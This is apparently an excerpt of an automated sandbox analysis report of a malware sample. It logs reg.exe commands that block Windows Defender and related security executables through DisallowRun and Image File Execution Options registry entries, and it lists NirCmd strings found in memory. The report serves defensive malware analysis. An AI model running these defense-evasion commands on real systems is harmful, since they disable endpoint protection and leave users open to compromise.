                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: svchost.exe, 0000001F.00000002.494437254.0000011C1E260000.00000002.00000001.sdmpBinary or memory string: Program Manager
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmp, svchost.exe, 0000001F.00000002.494437254.0000011C1E260000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmp, svchost.exe, 0000001F.00000002.494437254.0000011C1E260000.00000002.00000001.sdmpBinary or memory string: Progman
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpBinary or memory string: progman
                        Source: svchost.exe, 0000001F.00000002.494437254.0000011C1E260000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                        Source: screen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpBinary or memory string: shell_traywnd
                        Source: screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpBinary or memory string: "Userenv.dllCreateEnvironmentBlockCreateProcessWithLogonWExplorer.exeShell_TrayWndProgmanSetConsoleDisplayModeEnumDisplayDevicesAmasterwaveoutsynthcdmicrophonephoneauxlineheadphoneswaveinaltctrlshiftextplusspcentertabescinsdelDllRegisterServerDllUnregisterServerNirCmdWinClsfolder.loopcountcurrdate.currtime.sys.nir.param.fparam.clipboardNirComLinenowexefilesystemwindowsnircmdcommon_desktopcommon_start_menucommon_programsdesktopstart_menuprogramsstartupappdatacookiesfavoritesrecentcommon_startupcommon_favoritesprogramfilescommon_programfilesmydocumentsnormallowbelownormalabovenormalhighrealtimeSeTcbPrivilegeSeDebugPrivilegenohexnoasciibinCannot find the specified process !Failed to load the process library !leftshiftrightshiftleftctrlrightctrlleftmenurightmenudownupleftrighthomeendinsertdeletecommaminusperiodlwinrwinappspageuppagedownmultiplyaddsubtractseperatordividebackspacepausecapslocknumlockscrollprintscreen#32770clicksettextshowshownahidehideshowflashmaxminsettopmostfocusactivateenabledisabletoggledisabletogglehidetogglemintogglemaxredrawsetsizesendmsgpostmsgcenterchildmovedlgclickdlgsettextdlgsetfocus+style-style+exstyle-exstyletranstitlestitleititleetitleidclassprocessalltopalltopnodesktopprogmanshell_traywndbuttonallFailed to create the shortcut !nircmd.exe %sadmin$\nircmd.exe\\cfocusedsystemsoundsSound Devicesdefault_recordshowerrorparamsfilecmdwaitloopremotecopymultiremoteqboxcomqboxcomtopinfoboxqboxqboxtopexec2execexecmdcmd.execommand.com%s /c %sregsetvalThe specified key is not valid !SZEXPAND_SZDWORDBINARYregdelvalregdelkeyCannot delete the key, because it contains one or more subkeys.regeditinisetvalinidelvalinidelsecrasdialdlginetdialThe dialing function is not available in your system !rasdialUnable to receive dialup information of the specified entry !moverecyclebinemptybinrashangupFailed to hung up this RAS itemCannot find the specified connection name !exitwinlogoffpoweroffrebootshutdownforceforceifhungabortshutdowninitshutdowncmdshortcutcmdshortcutkeyshortcutshexecFailed to execute this file !clonefiletimesetfiletimesetfilefoldertimesetconsolemodeconsolewritesetconsolecolordebugwritesetcursorsetcursorwinrestartexplorersendkeypress+sendkeypresssendmousewheeldblclickmovecursorchangebrightness\\.\LCDsetbrightnesssetprimarydisplaysetdisplaymonitor:-updatereg-allusersFailed to change the display setting !Invalid display values !closeprocessFailed to close the specified process !killprocessFailed to kill the specified process !memdumpserviceUnable to load the services library !stopcontinuestartrestartautomanualdisabledbootwinhandleactiveforegroundlockwsclearsetfilereadfilewritefilewriteufileaddfileaddufilecopyimagesaveimageloadclpsaveclpsetdialuplogonFailed to set the logon details for this dialup item !scriptmediaplayopen "%s" type mpegvideo alias %splay %sclose %surlshortcut%fav%Failed to create the internet shortcut !monitoroffonasync_offasync_onasync_lowscreensaverscreensavertimeoutrunassystemwinlogon.exeruninteractiveruninteract
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
